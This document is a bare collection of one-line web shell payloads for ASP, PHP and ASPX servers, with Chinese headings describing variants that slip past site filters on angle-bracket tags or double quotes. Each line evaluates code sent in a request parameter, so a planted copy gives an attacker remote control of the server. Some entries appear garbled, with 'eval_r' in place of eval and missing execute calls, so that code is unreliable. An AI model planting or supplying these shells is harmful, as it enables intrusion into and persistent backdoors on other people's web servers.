<%eval request("value")%>

<%execute request("value")%>

<%execute(request("value"))%>

%><%eval_r(Request(chr(35)))%><%

<script language=VBScript runat=server>execute request("value")</script>

<?php eval_r($_POST[value])?>

<?php assert($_POST[value]);?>

<script language="php">@eval_r($_POST[value])</script>

<%@ Page Language="Jscript"%><%eval_r(Request.Item["value"],"unsafe");%>

----------------------------------------------------------------

0x01:ASP一句话

1.<% request("x")%>

2. <%executerequest("x")%>

3. <%execute(request("x"))%>

0x02:免杀大部分网站的一句话

4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""x""))") %>

0x03:免杀部分网站过略<%,%>的一句话

5.<script language=VBScript runat=server>execute request("x")</script>

0x04:免杀部分网站过略双引号的一句话

6.<% request(x(35))%>

0x05:php一句话

7.<?php ($_POST[x]);?>

0x06:aspx一句话

8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("x"); </script>